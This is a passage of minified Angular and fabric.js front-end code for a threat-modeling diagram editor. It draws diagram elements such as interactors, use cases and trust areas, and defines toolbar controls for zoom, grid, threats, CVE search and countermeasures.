e=a.transform.target,i=e._objects.find(Fe=>Fe[ot.myType]==wt.ElementBorder),n=e._objects.find(Fe=>Fe[ot.myType]==wt.ElementType),r=e._objects.find(Fe=>Fe[ot.myType]==wt.AppLabel1),c=e._objects.find(Fe=>Fe[ot.myType]==wt.AppLabel1Line),d=e._objects.find(Fe=>Fe[ot.myType]==wt.AppLabel2),T=e._objects.find(Fe=>Fe[ot.myType]==wt.AppLabel2Line),k=e._objects.find(Fe=>Fe[ot.myType]==wt.AppLabel3),q=e._objects.find(Fe=>Fe[ot.myType]==wt.AppLabel3Line),Y=e._objects.find(Fe=>Fe[ot.myType]==wt.AppLabel4),te=e._objects.find(Fe=>Fe[ot.myType]==wt.AppLabel4Line),pe=e.width*e.scaleX,Re=e.height*e.scaleY;i.set({height:Re,width:pe,scaleX:1,scaleY:1,left:-pe/2,top:-Re/2}),null==n||n.set({left:0,top:-Re/2+25}),null==r||r.set({left:-pe/2+20,top:0}),null==c||c.set({left:-pe/2+20,top:-Re/2,height:Re}),null==d||d.set({left:0,top:Re/2-16}),null==T||T.set({left:-pe/2,top:Re/2-20,width:pe}),null==k||k.set({left:pe/2,top:0}),null==q||q.set({left:pe/2-20,top:-Re/2,height:Re}),null==Y||Y.set({left:0,top:-Re/2+5}),null==te||te.set({left:-pe/2,top:-Re/2+20,width:pe}),this.onCanvasModified()}changeMobileAppInterfaceVisibility(a,e,i=!1){if(null==e&&(e=this.getCanvasElementByID(a.ID)),e){let n=e._objects.find(te=>te[ot.myType]==wt.AppLabel1),r=e._objects.find(te=>te[ot.myType]==wt.AppLabel1Line),c=e._objects.find(te=>te[ot.myType]==wt.AppLabel2),d=e._objects.find(te=>te[ot.myType]==wt.AppLabel2Line),T=e._objects.find(te=>te[ot.myType]==wt.AppLabel3),k=e._objects.find(te=>te[ot.myType]==wt.AppLabel3Line),q=e._objects.find(te=>te[ot.myType]==wt.AppLabel4),Y=e._objects.find(te=>te[ot.myType]==wt.AppLabel4Line);n.set("text",this.translate.instant(a.InterfaceLeft)),n.set(ot.visible,a.InterfaceLeft!=So.None&&!i),r.set(ot.visible,a.InterfaceLeft!=So.None&&!i),c.set("text",this.translate.instant(a.InterfaceBottom)),c.set(ot.visible,a.InterfaceBottom!=So.None&&!i),d.set(ot.visible,a.InterfaceBottom!=So.None&&!i),T.set("text",this.translate.instant(a.InterfaceRight)),T.set(ot.visible,a.InterfaceRight!=So.None&&!i),k.set(ot.visible,a.InterfaceRight!=So.None&&!i),null==q||q.set("text",this.translate.instant(a.InterfaceTop)),null==q||q.set(ot.visible,a.InterfaceTop!=So.None&&!i),null==Y||Y.set(ot.visible,a.InterfaceTop!=So.None&&!i),this.Canvas.requestRenderAll()}}createInteractor(a,e,i){let T=new Ei.fabric.Circle({left:35,top:22.5,radius:6,stroke:i instanceof As?this.theme.Primary:this.StrokeColor,strokeWidth:this.StrokeWidth,fill:"transparent",originX:"center",originY:"center",canvasID:Fo(),myType:wt.InteractorHead,selectable:!0,hasBorders:!1,hasControls:!1}),k=new Ei.fabric.Line([25,32.5,45,32.5],{stroke:i instanceof As?this.theme.Primary:this.StrokeColor,strokeWidth:this.StrokeWidth,myType:wt.InteractorArms}),q=new Ei.fabric.Line([33.5,28.5,33.5,42.5],{stroke:i instanceof As?this.theme.Primary:this.StrokeColor,strokeWidth:this.StrokeWidth,myType:wt.InteractorBody}),Y=new Ei.fabric.Line([34,37.5,25,52.5],{stroke:i instanceof As?this.theme.Primary:this.StrokeColor,strokeWidth:this.StrokeWidth,myType:wt.InteractorLeg1}),te=new Ei.fabric.Line([33,37.5,42,52.5],{stroke:i instanceof As?this.theme.Primary:this.StrokeColor,strokeWidth:this.StrokeWidth,myType:wt.InteractorLeg2}),pe=new Ei.fabric.Text(i.GetProperty("Name"),{fontSize:this.currentFontSizeConfig.Name,fill:this.StrokeColor,originX:"center",left:35,top:65,textAlign:"center",myType:wt.ElementName}),Re=[T,k,q,Y,te,...this.createFlowAnchors(70,65,!0,!0),pe],Fe=new Ei.fabric.Group(Re,{left:a,top:e,hasControls:!0,lockRotation:!0,lockScalingX:!0,lockScalingY:!0,hasBorders:!1,ID:i.ID,canvasID:Fo(),myType:wt.Interactor,subTargetCheck:!0});return Fe.on("scaling",Ne=>this.onScaleInteractor(Ne)),Fe.setControlsVisibility({mtr:!1}),Fe}onScaleInteractor(a){}createInterface(a,e,i,n){const d=new Ei.fabric.Rect({stroke:this.StrokeColor,strokeWidth:this.StrokeWidth,left:12.5,top:12.5,width:25,height:25,fill:this.isDarkMode?D2.BackgroundColorDark:D2.BackgroundColorLight,myType:wt.ElementBorder});let T=null;"Interface1"==n&&(T=new Ei.fabric.Text(i.GetProperty("Name"),{fontSize:this.currentFontSizeConfig.Name,fill:this.StrokeColor,originX:"center",left:25,top:-5,textAlign:"center",myType:wt.ElementName}));const k=[d,T,...this.createFlowAnchors(50,50,!0,!0,!1,!0)];4==this.AnchorCount&&[_i.NorthWest,_i.NorthEast,_i.SouthEast,_i.SouthWest].forEach(Y=>{var te;return null===(te=k.find(pe=>pe[ot.fa]==Y))||void 0===te?void 0:te.set(ot.visible,!1)});const q=new Ei.fabric.Group(k,{left:a,top:e,hasControls:!0,lockRotation:!0,lockScalingX:!0,lockScalingY:!0,hasBorders:!1,ID:i.ID,canvasID:Fo(),myType:wt.DeviceInterface,subTargetCheck:!0});return setTimeout(()=>{let Y=q._objects.find(Fe=>Fe[ot.myType]==wt.ElementBorder),Re=this.createTextPositionPoint("t0",q.left+q.width/2,q.top+q.height/2+Y.top-25,q);Re[ot.opacity]=0,q[ot.t0ID]=Re[ot.canvasID],this.Canvas.add(Re)},100),q.on("scaling",Y=>this.onScaleInterface(Y)),q.setControlsVisibility({mtr:!1}),q}createTextPositionPoint(a,e,i,n){var r=new Ei.fabric.Circle({left:e,top:i,radius:5,stroke:this.theme.Primary,fill:this.theme.Primary,originX:"center",originY:"center",name:a,canvasID:Fo(),myType:wt.TextPosPoint,selectable:!0,hasBorders:!1,hasControls:!1});return r[ot.textObjID]=n[ot.canvasID],r.setControlsVisibility({mtr:!1,mts:!1}),r}onScaleInterface(a){}createUseCase(a,e,i){let c=new Ei.fabric.Ellipse({stroke:this.StrokeColor,strokeWidth:this.StrokeWidth,width:140,height:50,rx:70,ry:25,fill:this.isDarkMode?D2.BackgroundColorDark:D2.BackgroundColorLight,myType:wt.ElementBorder}),d=new Ei.fabric.Text(i.GetProperty("Name"),{fontSize:this.currentFontSizeConfig.Name,fill:this.StrokeColor,originX:"center",left:70,top:17,textAlign:"center",myType:wt.ElementName}),T=[c];T.push(d,...this.createFlowAnchors(140,50,!0,!0));let k=new Ei.fabric.Group(T,{left:a,top:e,hasControls:!0,lockRotation:!0,lockScalingX:!1,lockScalingY:!1,hasBorders:!1,ID:i.ID,canvasID:Fo(),myType:wt.SystemUseCase,subTargetCheck:!0});return k.on("scaling",q=>this.onScaleUseCase(q)),k.setControlsVisibility({mtr:!1}),k}onScaleUseCase(a){this.onScaleElement(a);let e=a.transform.target,i=e._objects.find(c=>c[ot.myType]==wt.ElementBorder),n=e.width*e.scaleX,r=e.height*e.scaleY;i.set({height:r,width:n,scaleX:1,scaleY:1,left:-n/2,top:-r/2,rx:n/2,ry:r/2}),this.onCanvasModified()}createExternalEntity(a,e,i){const k=[new Ei.fabric.Rect({stroke:i instanceof td?this.theme.Primary:this.StrokeColor,strokeWidth:this.StrokeWidth,width:140,height:75,fill:"transparent",myType:wt.ElementBorder}),new Ei.fabric.Text("\xabExternal Entity\xbb",{fontSize:this.currentFontSizeConfig.Type,fill:this.StrokeColor,originX:"center",left:70,top:5,myType:wt.ElementType}),new Ei.fabric.Text(i.GetProperty("Name"),{fontSize:this.currentFontSizeConfig.Name,fill:this.StrokeColor,originX:"center",left:70,top:29.5,textAlign:"center",myType:wt.ElementName}),...this.createFlowAnchors(140,75,!0,!0,!1,!0)];4==this.AnchorCount&&[_i.NorthWest,_i.NorthEast,_i.SouthEast,_i.SouthWest].forEach(Y=>{var te;return null===(te=k.find(pe=>pe[ot.fa]==Y))||void 0===te?void 0:te.set(ot.visible,!1)});const q=new Ei.fabric.Group(k,{left:a,top:e,hasControls:!0,lockRotation:!0,lockScalingX:!1,lockScalingY:!1,hasBorders:!1,subTargetCheck:!0,ID:i.ID,canvasID:Fo(),myType:wt.SystemExternalEntity});return q.on("scaling",Y=>this.onScaleExternalEntity(Y)),q.setControlsVisibility({mtr:!1}),q}onScaleExternalEntity(a){this.onScaleElement(a);let e=a.transform.target,i=e._objects.find(c=>c[ot.myType]==wt.ElementBorder),n=e.width*e.scaleX,r=e.height*e.scaleY;i.set({height:r,width:n,scaleX:1,scaleY:1,left:-n/2,top:-r/2}),this.onCanvasModified()}createTrustArea(a,e,i,n=300,r=300){let c=new Ei.fabric.Rect({stroke:this.StrokeColor,strokeWidth:this.StrokeWidth,width:n,height:r,strokeDashArray:[10,5],fill:"transparent",myType:wt.ElementBorder}),d=new Ei.fabric.Text(i.GetProperty("Name"),{fontSize:this.currentFontSizeConfig.Type,fill:this.StrokeColor,originX:"left",originY:"top",left:5,top:5,myType:wt.ElementName}),T=new Ei.fabric.Group([c,d],{left:a,top:e,hasControls:!0,hasBorders:!1,lockRotation:!0,ID:i.ID,canvasID:Fo(),elementTypeID:Et.LogTrustArea,myType:wt.TrustArea});return T.on("scaling",k=>this.onScaleTrustArea(k)),T.setControlsVisibility({mtr:!1}),T}onScaleTrustArea(a){this.onScaleElement(a);let e=a.transform.target,i=e._objects.find(d=>d[ot.myType]==wt.ElementBorder),n=e._objects.find(d=>d[ot.myType]==wt.ElementName),r=e.width*e.scaleX,c=e.height*e.scaleY;i.set({height:c,width:r,scaleX:1,scaleY:1,left:-r/2,top:-c/2}),n.set({left:-r/2+5,top:-c/2+5}),this.onCanvasModified()}}let Clt=(()=>{class t{constructor(e,i,n,r,c){this.theme=e,this.dataService=i,this.dialog=n,this.locStorage=r,this.translate=c,this.faArrowsAltH=V$,this.faLongArrowAltRight=XX,this.menuTopLeftPosition={x:"0",y:"0"},this.selectionChanged=new Tt,this.navTreeChanged=new Tt}get Zoom(){if(this.Dia.Canvas){let e=this.Dia.Canvas.getZoom();return[.33,.5,.66,.75,1,1.5,2,2.5,3].includes(e)||(this.zoomSelect.nativeElement.selectedIndex=9),e}return null}set Zoom(e){this.Dia.SetZoom(e),this.locStorage.Set(si.PAGE_MODELING_DIAGRAM_ZOOM,e.toString())}get IsContextDiagram(){return this.diagram instanceof b2}get HasMnemonics(){return this.dataService.Config.GetStencilThreatMnemonics().length>0}get HasThreatRuleGroups(){var e;return(null===(e=this.GetThreatRuleGroups())||void 0===e?void 0:e.length)>0}get selectedElement(){var e;return null===(e=this.Dia)||void 0===e?void 0:e.SelectedElement}set selectedElement(e){this.Dia&&(this.Dia.SelectedElement=e)}ngOnInit(){var e;this.diagram&&this.diagram instanceof as?(this.diagram instanceof Bg?this.Dia=new $T(this.diagram,this.dataService,this.theme,this.dialog,this.locStorage,this.translate):this.diagram instanceof b2&&(this.Dia=new R7(this.diagram,this.dataService,this.theme,this.dialog,this.locStorage,this.translate,null===(e=this.selectedNode)||void 0===e?void 0:e.dataType)),this.Dia.SelectionChanged.subscribe(i=>{this.selectionChanged.emit(i)}),this.Dia.NavTreeChanged.subscribe(()=>this.navTreeChanged.emit())):console.error("Undefined diagram")}onKeyDown(e){e.ctrlKey?"c"==e.key&&this.selectedElement&&"BODY"==document.activeElement.tagName?(e.preventDefault(),this.Dia.CopyElement()):"v"==e.key&&this.Dia.CanCopy&&"BODY"==document.activeElement.tagName&&(e.preventDefault(),this.Dia.PasteElement()):"Delete"==e.key&&this.selectedElement&&"BODY"==document.activeElement.tagName&&(e.preventDefault(),this.Dia.OnDeleteElement(this.selectedElement))}ngOnDestroy(){this.Dia.Save()}GetIconColor(e){return e?this.theme.IsDarkMode?"#FFF":"#000":this.theme.IsDarkMode?"#676767":"#B6B6B6"}GetContextIconColor(e){return e?this.theme.IsDarkMode?"#FFF":"#707070":this.theme.IsDarkMode?"#676767":"#B6B6B6"}ShowSuggestedThreats(){this.dialog.OpenSuggestThreatsDialog(this.selectedElement)}ShowCVESearch(){this.dialog.OpenCveSearchDialog(this.selectedElement,this.diagram.ID)}GetThreatRuleGroups(){let e=this.dataService.Config.GetThreatRuleGroups().filter(i=>{var n;return(null===(n=i.ThreatRules)||void 0===n?void 0:n.length)>0});return this.diagram.Settings.GenerationThreatLibrary&&(e=e.filter(i=>i.ThreatRules.every(n=>!n.IsActive))),e}OnResized(e,i){this.Dia.OnResized(e,i)}SetZoom(e){this.Zoom=Number(e.target.value)}OpenContextMenu(e){e.preventDefault(),this.menuTopLeftPosition.x=e.clientX+"px",this.menuTopLeftPosition.y=e.clientY+"px",this.matMenuTrigger.menuData={item:this.selectedElement},this.matMenuTrigger.openMenu()}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi),Ee(Wn),Ee(_r),Ee(Sn))},t.\u0275cmp=Wt({type:t,selectors:[["app-diagram"]],viewQuery:function(e,i){if(1&e&&(Mi($ct,5),Mi(Kct,5)),2&e){let n;Vt(n=Bt())&&(i.matMenuTrigger=n.first),Vt(n=Bt())&&(i.zoomSelect=n.first)}},hostBindings:function(e,i){1&e&&he("keydown",function(r){return i.onKeyDown(r)},0,Qc)},inputs:{selectedNode:"selectedNode",diagram:"diagram",selectedElement:"selectedElement"},outputs:{selectionChanged:"selectionChanged",navTreeChanged:"navTreeChanged"},decls:360,vars:176,consts:[[2,"width","100%","height","100%"],[1,"tools","mat-elevation-z8"],["mat-button","","matTooltipShowDelay","1000",1,"toolBtn",3,"matTooltip","click"],["mat-button","","matTooltipShowDelay","1000",1,"toolBtn",2,"margin-left","0px",3,"matTooltip","click"],["mat-button","","matTooltipShowDelay","1000",1,"toolBtn",3,"disabled","matTooltip","click"],["mat-button","","matTooltipShowDelay","1000",1,"toolBtn",3,"matMenuTriggerFor","matTooltip"],["gridMenu","matMenu"],["mat-menu-item",""],["color","primary",3,"ngModel","ngModelChange","click"],["color","primary",3,"disabled","ngModel","ngModelChange","click"],["xmlns","http://www.w3.org/2000/svg","width","25","height","25","version","1.1"],["cx","3","cy","3","r","2",4,"ngIf"],["cx","3","cy","20","r","2",4,"ngIf"],["cx","20","cy","3","r","2",4,"ngIf"],["cx","20","cy","20","r","2",4,"ngIf"],["cx","11.5","cy","3","r","2"],["cx","11.5","cy","20","r","2"],["cx","3","cy","11.5","r","2"],["cx","20","cy","11.5","r","2"],["mat-button","","class","toolBtn","matTooltipShowDelay","1000",3,"toolBtn-Selected","matTooltip","click",4,"ngIf"],["mat-button","","class","toolBtn","style","margin-left: 0px;","matTooltipShowDelay","1000",3,"toolBtn-Selected","matTooltip","click",4,"ngIf"],["textSizeMenu","matMenu"],["mat-menu-item","",2,"height","fit-content",3,"click"],["color","primary","value","1",3,"checked"],["color","primary","value","2",3,"checked"],["color","primary","value","3",3,"checked"],["color","primary","value","4",3,"checked"],["color","primary","value","5",3,"checked"],["mat-button","","class","toolBtn","matTooltipShowDelay","1000",3,"disabled","matTooltip","click",4,"ngIf"],["x","7.5","y","9","width","10","height","7","rx","3","ry","3","stroke-width","1"],["x","2.5","y","2.5","width","11","height","8","rx","3","ry","3","stroke-width","1.5"],["x","4.5","y","4.5","width","7","height","4","rx","2","ry","2","stroke-width","1.5"],["x","11.5","y","14.5","width","11","height","8","rx","3","ry","3","stroke-width","1.5"],["x","13.5","y","16.5","width","7","height","4","rx","2","ry","2","stroke-width","1.5"],["x","5","y","5","width","10","height","10","rx","3","ry","3","stroke-width","1"],["x","10","y","10","width","11","height","11","rx","3","ry","3","stroke-width","1.5"],["x","12","y","12","width","7","height","7","rx","2","ry","2","stroke-width","1.5"],["x","7.5","y","8.5","width","10","height","9","rx","3","ry","3","stroke-width","1"],["matBadgeColor","primary","matBadgeSize","small","matBadgePosition","below",2,"z-index","1",3,"matBadge","matBadgeHidden"],["x","1","y","1","width","23","height","23","rx","3","ry","3"],["x","2","y","16",1,"heavy"],["mat-button","","class","toolBtn","color","accent","matTooltipShowDelay","1000",3,"disabled","matTooltip","click",4,"ngIf"],["mat-button","","matTooltipShowDelay","1000",1,"toolBtn",2,"z-index","1",3,"matMenuTriggerFor","matTooltip"],["matBadge","G","matBadgeColor","primary","matBadgeSize","small","matBadgePosition","below"],["generationMenu","matMenu"],["mat-menu-item","",3,"matMenuTriggerFor",4,"ngIf"],["mat-menu-item","",3,"disabled","matMenuTriggerFor"],["mnemonics","matMenu"],["mat-menu-item","",4,"ngFor","ngForOf"],["ruleGroups","matMenu"],[2,"margin-right","5px","float","right","margin-top","3px",3,"value","change"],["zoomSelect",""],["value","0.33"],["value","0.5"],["value","0.66"],["value","0.75"],["value","1"],["value","1.5"],["value","2"],["value","2.5"],["value","3"],[3,"value",4,"ngIf"],["mat-button","","matTooltipShowDelay","1000",1,"toolBtn",2,"margin-right","5px","float","right",3,"matTooltip","click"],[1,"my-canvas",2,"width","100%","float","left","overflow","auto",3,"resized","mousedown","mouseup","contextmenu"],["cc",""],[2,"visibility","hidden","position","fixed",3,"matMenuTriggerFor"],["ctxMenu","matMenuTrigger"],["rightMenu","matMenu"],["matMenuContent",""],["cx","3","cy","3","r","2"],["cx","3","cy","20","r","2"],["cx","20","cy","3","r","2"],["cx","20","cy","20","r","2"],[3,"icon"],["mat-button","","color","accent","matTooltipShowDelay","1000",1,"toolBtn",3,"disabled","matTooltip","click"],["mat-menu-item","",3,"matMenuTriggerFor"],[3,"value"],[4,"ngIf"],["mat-menu-item","",3,"matMenuTriggerFor","click"],["saveImg","matMenu"],["style","margin-left: 20px; margin-right: 20px;",4,"ngIf"],["mat-menu-item","",3,"click"],["mat-menu-item","",3,"disabled","click"],["mat-menu-item","",3,"click",4,"ngIf"],[2,"margin-left","20px","margin-right","20px"]],template:function(e,i){if(1&e){const n=Ye();m(0,"div",0),s(1,"\n  "),m(2,"div",1),s(3,"\n    "),m(4,"button",2),he("click",function(){return i.Dia.SetMouse()}),oe(5,"translate"),s(6,"\n      "),m(7,"mat-icon"),s(8,"mouse"),u(),s(9,"\n    "),u(),s(10,"\n    "),m(11,"button",3),he("click",function(){return i.Dia.SetPan()}),oe(12,"translate"),s(13,"\n      "),m(14,"mat-icon"),s(15,"pan_tool"),u(),s(16,"\n    "),u(),s(17,"\n    "),m(18,"button",4),he("click",function(){return i.Dia.SetMove()}),oe(19,"translate"),s(20,"\n      "),m(21,"mat-icon"),s(22,"highlight_alt"),u(),s(23,"\n    "),u(),s(24,"\n    "),m(25,"button",5),oe(26,"translate"),s(27,"\n      "),m(28,"mat-icon"),s(29,"grid_4x4"),u(),s(30,"\n    "),u(),s(31,"\n    "),m(32,"mat-menu",null,6),s(34,"\n      "),m(35,"button",7),s(36,"\n        "),m(37,"mat-slide-toggle",8),he("ngModelChange",function(c){return i.Dia.ShowGrid=c})("click",function(c){return c.stopPropagation()}),s(38),oe(39,"translate"),u(),s(40,"\n      "),u(),s(41,"\n      "),m(42,"button",7),s(43,"\n        "),m(44,"mat-slide-toggle",9),he("ngModelChange",function(c){return i.Dia.StickToGrid=c})("click",function(c){return c.stopPropagation()}),s(45),oe(46,"translate"),u(),s(47,"\n      "),u(),s(48,"\n    "),u(),s(49,"\n\n    "),m(50,"button",4),he("click",function(){return i.Dia.AnchorCount=8==i.Dia.AnchorCount?4:8}),oe(51,"translate"),s(52,"\n      "),fi(),m(53,"svg",10),s(54,"\n        "),ne(55,Xct,1,1,"circle",11),s(56,"\n        "),ne(57,Yct,1,1,"circle",12),s(58,"\n        "),ne(59,Jct,1,1,"circle",13),s(60,"\n        "),ne(61,Zct,1,1,"circle",14),s(62,"\n      \n        "),it(63,"circle",15),s(64,"\n        "),it(65,"circle",16),s(66,"\n        "),it(67,"circle",17),s(68,"\n        "),it(69,"circle",18),s(70,"\n      "),u(),s(71,"\n    "),u(),s(72,"\n\n    "),ne(73,tlt,5,7,"button",19),s(74,"\n    "),ne(75,ilt,5,6,"button",20),s(76,"\n    "),ne(77,alt,6,5,"button",19),s(78,"\n    "),ne(79,nlt,6,5,"button",19),s(80,"\n    "),ln(),m(81,"button",5),oe(82,"translate"),s(83,"\n      "),m(84,"mat-icon"),s(85,"format_size"),u(),s(86,"\n    "),u(),s(87,"\n    "),m(88,"mat-menu",null,21),s(90,"\n      "),m(91,"button",22),he("click",function(){return i.Dia.FontSizeConfigIndex=1}),s(92,"\n        "),m(93,"mat-radio-group"),s(94,"\n          "),m(95,"mat-radio-button",23),s(96),oe(97,"translate"),u(),s(98,"\n        "),u(),s(99,"\n      "),u(),s(100,"\n      "),m(101,"button",22),he("click",function(){return i.Dia.FontSizeConfigIndex=2}),s(102,"\n        "),m(103,"mat-radio-group"),s(104,"\n          "),m(105,"mat-radio-button",24),s(106),oe(107,"translate"),u(),s(108,"\n        "),u(),s(109,"\n      "),u(),s(110,"\n      "),m(111,"button",22),he("click",function(){return i.Dia.FontSizeConfigIndex=3}),s(112,"\n        "),m(113,"mat-radio-group"),s(114,"\n          "),m(115,"mat-radio-button",25),s(116),oe(117,"translate"),u(),s(118,"\n        "),u(),s(119,"\n      "),u(),s(120,"\n      "),m(121,"button",22),he("click",function(){return i.Dia.FontSizeConfigIndex=4}),s(122,"\n        "),m(123,"mat-radio-group"),s(124,"\n          "),m(125,"mat-radio-button",26),s(126),oe(127,"translate"),u(),s(128,"\n        "),u(),s(129,"\n      "),u(),s(130,"\n      "),m(131,"button",22),he("click",function(){return i.Dia.FontSizeConfigIndex=5}),s(132,"\n        "),m(133,"mat-radio-group"),s(134,"\n          "),m(135,"mat-radio-button",27),s(136),oe(137,"translate"),u(),s(138,"\n        "),u(),s(139,"\n      "),u(),s(140,"\n    "),u(),s(141,"\n    "),ne(142,olt,6,4,"button",28),s(143,"\n    "),ne(144,rlt,6,4,"button",28),s(145,"\n    "),m(146,"button",4),he("click",function(){return i.Dia.SendToBack()}),oe(147,"translate"),s(148,"\n      "),fi(),m(149,"svg",10),s(150,"\n        "),it(151,"rect",29),s(152,"\n        "),it(153,"rect",30),s(154,"\n        "),it(155,"rect",31),s(156,"\n        "),it(157,"rect",32),s(158,"\n        "),it(159,"rect",33),s(160,"\n      "),u(),s(161,"\n    "),u(),s(162,"\n    "),ln(),m(163,"button",4),he("click",function(){return i.Dia.SendBackwards()}),oe(164,"translate"),s(165,"\n      "),fi(),m(166,"svg",10),s(167,"\n        "),it(168,"rect",34),s(169,"\n        "),it(170,"rect",35),s(171,"\n        "),it(172,"rect",36),s(173,"\n      "),u(),s(174,"\n    "),u(),s(175,"\n    "),ln(),m(176,"button",4),he("click",function(){return i.Dia.BringForward()}),oe(177,"translate"),s(178,"\n      "),fi(),m(179,"svg",10),s(180,"\n        "),it(181,"rect",35),s(182,"\n        "),it(183,"rect",36),s(184,"\n        "),it(185,"rect",34),s(186,"\n      "),u(),s(187,"\n    "),u(),s(188,"\n    "),ln(),m(189,"button",4),he("click",function(){return i.Dia.BringToFront()}),oe(190,"translate"),s(191,"\n      "),fi(),m(192,"svg",10),s(193,"\n        "),it(194,"rect",30),s(195,"\n        "),it(196,"rect",31),s(197,"\n        "),it(198,"rect",32),s(199,"\n        "),it(200,"rect",33),s(201,"\n        "),it(202,"rect",37),s(203,"\n      "),u(),s(204,"\n    "),u(),s(205,"\n    "),ln(),m(206,"button",4),he("click",function(){return i.Dia.AddAnnotation()}),oe(207,"translate"),s(208,"\n      "),m(209,"mat-icon"),s(210,"edit"),u(),s(211,"\n    "),u(),s(212,"\n    "),s(213,"\n    "),m(214,"button",4),he("click",function(){return i.Dia.SelectNextUninitObject()}),oe(215,"translate"),s(216,"\n      "),m(217,"mat-icon",38),s(218,"update"),u(),s(219,"\n    "),u(),s(220,"\n    "),m(221,"button",4),he("click",function(){return i.ShowSuggestedThreats()}),oe(222,"translate"),s(223,"\n      "),m(224,"mat-icon"),s(225,"flash_auto"),u(),s(226,"\n    "),u(),s(227,"\n    "),m(228,"button",4),he("click",function(){return i.Dia.AddThreat()}),oe(229,"translate"),s(230,"\n      "),m(231,"mat-icon"),s(232,"flash_on"),u(),s(233,"\n    "),u(),s(234,"\n    "),m(235,"button",4),he("click",function(){return i.ShowCVESearch()}),oe(236,"translate"),s(237,"\n      "),s(238,"\n      "),fi(),m(239,"svg",10),s(240,"\n        "),it(241,"rect",39),s(242,"\n        "),m(243,"text",40),s(244,"CVE"),u(),s(245,"\n      "),u(),s(246,"\n    "),u(),s(247,"\n    "),ne(248,slt,6,4,"button",28),s(249,"\n    "),ln(),m(250,"button",4),he("click",function(){return i.Dia.AddCountermeasure()}),oe(251,"translate"),s(252,"\n      "),m(253,"mat-icon"),s(254,"security"),u(),s(255,"\n    "),u(),s(256,"\n    "),ne(257,clt,6,4,"button",41),s(258,"\n    "),m(259,"button",42),oe(260,"translate"),s(261,"\n      "),m(262,"mat-icon",43),s(263,"settings"),u(),s(264,"\n    "),u(),s(265,"\n    "),m(266,"mat-menu",null,44),s(268,"\n      "),m(269,"button",7),s(270,"\n        "),m(271,"mat-slide-toggle",8),he("ngModelChange",function(c){return i.diagram.Settings.GenerationThreatLibrary=c})("click",function(c){return c.stopPropagation()}),s(272),oe(273,"translate"),u(),s(274,"\n      "),u(),s(275,"\n      "),ne(276,llt,2,1,"button",45),s(277,"\n      "),m(278,"button",46),s(279),oe(280,"translate"),u(),s(281,"\n      "),m(282,"button",7),s(283,"\n        "),m(284,"mat-slide-toggle",8),he("ngModelChange",function(c){return i.diagram.Settings.GenerationAssetBased=c})("click",function(c){return c.stopPropagation()}),s(285),oe(286,"translate"),u(),s(287,"\n      "),u(),s(288,"\n      "),m(289,"mat-menu",null,47),s(291,"\n        "),ne(292,dlt,5,2,"button",48),s(293,"\n      "),u(),s(294,"\n      "),m(295,"mat-menu",null,49),s(297,"\n        "),ne(298,mlt,5,2,"button",48),s(299,"\n      "),u(),s(300,"\n    "),u(),s(301,"\n    "),s(302,"\n    "),m(303,"select",50,51),he("change",function(c){return i.SetZoom(c)}),s(305,"\n      "),m(306,"option",52),s(307,"33%"),u(),s(308,"\n      "),m(309,"option",53),s(310,"50%"),u(),s(311,"\n      "),m(312,"option",54),s(313,"66%"),u(),s(314,"\n      "),m(315,"option",55),s(316,"75%"),u(),s(317,"\n      "),m(318,"option",56),s(319,"100%"),u(),s(320,"\n      "),m(321,"option",57),s(322,"150%"),u(),s(323,"\n      "),m(324,"option",58),s(325,"200%"),u(),s(326,"\n      "),m(327,"option",59),s(328,"250%"),u(),s(329,"\n      "),m(330,"option",60),s(331,"300%"),u(),s(332,"\n      "),ne(333,ult,3,5,"option",61),s(334,"\n    "),u(),s(335,"\n    "),m(336,"button",62),he("click",function(){return i.Dia.FitToCanvas(i.Dia.CanvasScreenWidth,i.Dia.CanvasScreenHeight)}),oe(337,"translate"),s(338,"\n      "),m(339,"mat-icon"),s(340,"fit_screen"),u(),s(341,"\n    "),u(),s(342,"\n  "),u(),s(343,"\n  "),m(344,"div",63,64),he("resized",function(c){be(n);const d=Ti(345);return Me(i.Dia.OnResized(c,d))})("mousedown",function(c){return i.Dia.OnOuterCanvasMouseDown(c)})("mouseup",function(c){return i.Dia.OnOuterCanvasMouseUp(c)})("contextmenu",function(c){return i.OpenContextMenu(c)}),s(346,"\n    "),s(347,"\n    "),s(348,"\n  "),u(),s(349,"\n\n  "),it(350,"div",65,66),s(352," \n  "),m(353,"mat-menu",null,67),s(355," \n    "),ne(356,_lt,24,9,"ng-template",68),s(357," \n  "),u(),s(358," \n"),u(),s(359,"\n")}if(2&e){const n=Ti(33),r=Ti(89),c=Ti(267),d=Ti(296),T=Ti(354);C(2),Ct("bg-color-light2",!i.theme.IsDarkMode)("bg-color-dark2",i.theme.IsDarkMode),C(2),Ct("toolBtn-Selected","mouse"==i.Dia.MouseMode),at("matTooltip",re(5,119,"pages.modeling.diagram.mouse")),C(7),Ct("toolBtn-Selected","pan"==i.Dia.MouseMode),at("matTooltip",re(12,121,"pages.modeling.diagram.pan")),C(7),Ct("toolBtn-Selected","move"==i.Dia.MouseMode),at("matTooltip",re(19,123,"pages.modeling.diagram.move")),V("disabled",!0),C(7),at("matTooltip",re(26,125,"pages.modeling.diagram.grid")),V("matMenuTriggerFor",n),C(12),V("ngModel",i.Dia.ShowGrid),C(1),ct("\n          ",re(39,127,"pages.modeling.diagram.showGrid"),"\n        "),C(6),V("disabled",!i.Dia.ShowGrid)("ngModel",i.Dia.StickToGrid),C(1),ct("\n          ",re(46,129,"pages.modeling.diagram.stickToGrid"),"\n        "),C(5),at("matTooltip",re(51,131,8==i.Dia.AnchorCount?"pages.modeling.diagram.anchorCount8":"pages.modeling.diagram.anchorCount4")),V("disabled",!i.Dia.CanSetAnchorCount),C(5),V("ngIf",8==i.Dia.AnchorCount),C(2),V("ngIf",8==i.Dia.AnchorCount),C(2),V("ngIf",8==i.Dia.AnchorCount),C(2),V("ngIf",8==i.Dia.AnchorCount),C(2),Rt("fill",i.GetIconColor(i.Dia.CanSetAnchorCount)),C(2),Rt("fill",i.GetIconColor(i.Dia.CanSetAnchorCount)),C(2),Rt("fill",i.GetIconColor(i.Dia.CanSetAnchorCount)),C(2),Rt("fill",i.GetIconColor(i.Dia.CanSetAnchorCount)),C(4),V("ngIf","HW"!=i.Dia.Diagram.DiagramType),C(2),V("ngIf","HW"!=i.Dia.Diagram.DiagramType),C(2),V("ngIf","HW"!=i.Dia.Diagram.DiagramType),C(2),V("ngIf","HW"!=i.Dia.Diagram.DiagramType),C(2),at("matTooltip",re(82,133,"pages.modeling.diagram.textFormatSize")),V("matMenuTriggerFor",r),C(14),V("checked",1==i.Dia.FontSizeConfigIndex),C(1),ke(re(97,135,"pages.modeling.d